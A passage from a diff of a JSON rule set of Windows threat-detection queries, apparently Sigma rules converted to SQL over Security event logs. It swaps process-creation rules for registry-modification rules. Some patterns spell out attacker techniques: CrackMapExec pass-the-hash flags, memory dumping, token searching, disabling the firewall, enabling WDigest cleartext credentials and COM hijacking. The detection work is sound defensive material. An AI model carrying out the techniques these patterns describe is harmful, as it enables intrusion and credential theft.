"registry_set_exploit_guard_susp_allowed_apps.yml" }, { - "title": "Suspicious Scheduled Task Name As GUID", - "id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", - "status": "experimental", - "description": "Detects creation of a scheduled task with a GUID like name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell as a Service in Registry", + "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "status": "test", + "description": "Detects that a powershell code is 
written to the registry as a service.", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1569.002" ], "falsepositives": [ - "Legitimate software naming their tasks as GUIDs" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (CommandLine LIKE '%/TN \"{%' ESCAPE '\\' OR CommandLine LIKE '%/TN ''{%' ESCAPE '\\' OR CommandLine LIKE '%/TN {%' ESCAPE '\\') AND (CommandLine LIKE '%}\"%' ESCAPE '\\' OR CommandLine LIKE '%}''%' ESCAPE '\\' OR CommandLine LIKE '%} %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_guid_task_name.yml" + "filename": "registry_set_powershell_as_service.yml" }, { - "title": "HackTool - CrackMapExec Execution", - "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "title": "Outlook Macro Execution Without Warning Setting Enabled", + "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", "status": "test", - "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", + "author": "@ScoubiMtl", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + "filename": "registry_set_office_outlook_enable_macro_execution.yml" }, { - "title": "Sideloading Link.EXE", - "id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "title": "Disable Windows Security Center Notifications", + "id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", 
"status": "experimental", - "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\link.exe' ESCAPE '\\' AND CommandLine LIKE '%LINK /%' ESCAPE '\\') AND NOT (((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_sideload_link_binary.yml" + "filename": "registry_set_disable_security_center_notifications.yml" }, { - "title": "Process Memory Dumped Via RdrLeakDiag.EXE", - "id": "6355a919-2e97-4285-a673-74645566340d", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", + "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "status": "experimental", - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to 
run applications or execute macros", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' AND CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\') OR (CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\' AND CommandLine LIKE '% /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_lolbin_rdrleakdiag.yml" + "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Remote CHM File Download/Execution Via HH.EXE", - "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits", + "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", "status": "experimental", - "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S, frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.001" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR 
NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '% http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((NewValue LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR NewValue LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Suspicious Regsvr32 Execution From Remote Share", - "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "title": "IE Change Domain Zone", + "id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", "status": "experimental", - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Hides the file extension through modification of the registry", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet 
Settings\\\\ZoneMap\\\\Domains\\\\%' ESCAPE '\\') AND NOT (NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', '(Empty)')))" ], - "filename": "proc_creation_win_regsvr32_remote_share.yml" + "filename": "registry_set_change_security_zones.yml" }, { - "title": "Use of Squirrel.exe", - "id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", + "title": "Potential Persistence Via Shim Database Modification", + "id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", "status": "experimental", - "description": "Detects the usage of the \"Squirrel.exe\" binary as a LOLBIN. This binary is part of multiple software installations (Slack, Teams, Discord, etc.)", - "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.persistence", + "attack.t1546.011" ], "falsepositives": [ - "Expected FP with some electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop,...Etc)" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\squirrel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\update.exe' ESCAPE '\\') AND (((CommandLine LIKE '% --download %' ESCAPE '\\' OR CommandLine LIKE '% --update %' ESCAPE '\\' OR CommandLine LIKE '% --updateRollback=%' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE 
'\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '% --processStart%' ESCAPE '\\' AND CommandLine LIKE '%Discord.exe%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%GitHubDesktop.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--createShortcut%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Teams.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Yammer.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\%' ESCAPE '\\') AND EventType = 'SetValue') AND NOT (NewValue = ''))" ], - "filename": "proc_creation_win_lolbin_squirrel.yml" + "filename": "registry_set_persistence_shim_databases.yml" }, { - "title": "Copy From VolumeShadowCopy Via Cmd.EXE", - "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "status": "experimental", - "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes 
used to copy registry hives that are in use)", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "DHCP Callout DLL Installation", + "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "status": "test", + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "author": "Dimitrios Slamaris", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Backup scenarios using the commandline" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_shadowcopy_access.yml" + "filename": "registry_set_dhcp_calloutdll.yml" }, { - "title": "Use of Setres.exe", - "id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", + "title": "Disable Windows Firewall by Registry", + "id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", "status": "experimental", - "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", - "author": "@gott_cyber", + "description": "Detect set EnableFirewall to 0 to disable the windows firewall", + "author": "frack113", "tags": [ "attack.defense_evasion", - 
"attack.t1218", - "attack.t1202" + "attack.t1562.004" ], "falsepositives": [ - "Legitimate usage of Setres" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\setres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\choice' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\StandardProfile\\\\EnableFirewall' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\DomainProfile\\\\EnableFirewall' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_setres.yml" + "filename": "registry_set_disable_windows_firewall.yml" }, { - "title": "Suspicious Office Token Search Via CLI", - "id": "6d3a3952-6530-44a3-8554-cf17c116c615", + "title": "Potential EventLog File Location Tampering", + "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", "status": "experimental", - "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. 
This technique is used to tamper with log collection and alerting", + "author": "D3F7A5105", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%eyJ0eXAiOi%' ESCAPE '\\' OR CommandLine LIKE '% eyJ0eX%' ESCAPE '\\' OR CommandLine LIKE '% \"eyJ0eX\"%' ESCAPE '\\' OR CommandLine LIKE '% ''eyJ0eX''%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (NewValue LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_office_token_search.yml" + "filename": "registry_set_evtx_file_key_tamper.yml" }, { - "title": "Remote Access Tool - AnyDesk Piped Password Via CLI", - "id": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "title": "COM Hijacking via TreatAs", + "id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", "status": "experimental", - "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Legitimate piping of the password to anydesk", - "Some FP could occur with similar tools that uses the same command line '--set-password'" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%/c 
%' ESCAPE '\\' AND CommandLine LIKE '%echo %' ESCAPE '\\' AND CommandLine LIKE '%.exe --set-password%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%TreatAs\\\\(Default)' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" + "filename": "registry_set_treatas_persistence.yml" }, { - "title": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", - "id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", - "status": "experimental", - "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. 
This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wdigest Enable UseLogonCredential", + "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "status": "test", + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of appcmd to add new URL rewrite rules" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:system.webServer/rewrite/globalRules%' ESCAPE '\\' AND CommandLine LIKE '%commit:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" + "filename": "registry_set_wdigest_enable_uselogoncredential.yml" }, { - "title": "Fsutil Suspicious Invocation", - "id": "add64136-62e5-48ea-807e-88638d02df1e", - "status": "stable", - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "author": "Ecco, E.M. 
Anhaus, oscd.community", + "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "status": "test", + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", "tags": [ + "attack.persistence", + "attack.execution", "attack.defense_evasion", - "attack.t1070" + "attack.t1112" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.com%' ESCAPE '\\' OR NewValue LIKE '%C:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_fsutil_usage.yml" + "filename": "registry_set_cve_2020_1048_new_printer_port.yml" }, { - "title": "Mustang Panda Dropper", - "id": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "title": "Session Manager Autorun Keys Modification", + "id": "046218bd-e0d8-4113-a3c3-895a12b2b298", "status": "test", - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor 
Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.persistence", + "attack.t1547.001", + "attack.t1546.009" ], "falsepositives": [ - "Unlikely" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Temp\\\\wtask.exe /create%' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-3,1\\%\\%PUBLIC:~-9,1\\%%' ESCAPE '\\' OR CommandLine LIKE '%/tn \"Security Script %' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-1,1\\%%' ESCAPE '\\') OR (CommandLine LIKE '%/E:vbscript%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\' AND CommandLine LIKE '%/F%' ESCAPE '\\') OR NewProcessName LIKE '%Temp\\\\winwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\SetupExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\S0InitialCommand%' ESCAPE '\\' OR TargetObject LIKE '%\\\\KnownDlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Execute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppCertDlls%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" ], - "filename": "proc_creation_win_apt_mustangpanda.yml" + "filename": "registry_set_asep_reg_keys_modification_session_manager.yml" }, { - "title": "Fake Instance Of Hxtsr.exe", - "id": "4e762605-34a8-406d-b72e-c1a089313320", - "status": "test", - "description": "HxTsr.exe is 
a Microsoft compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nIts path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", - "author": "Sreeman", + "title": "CurrentControlSet Autorun Keys Modification", + "id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName = 'hxtsr.exe' AND NOT (CurrentDirectory LIKE 'C:\\\\program files\\\\windowsapps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND CurrentDirectory LIKE '%\\\\hxtsr.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Terminal 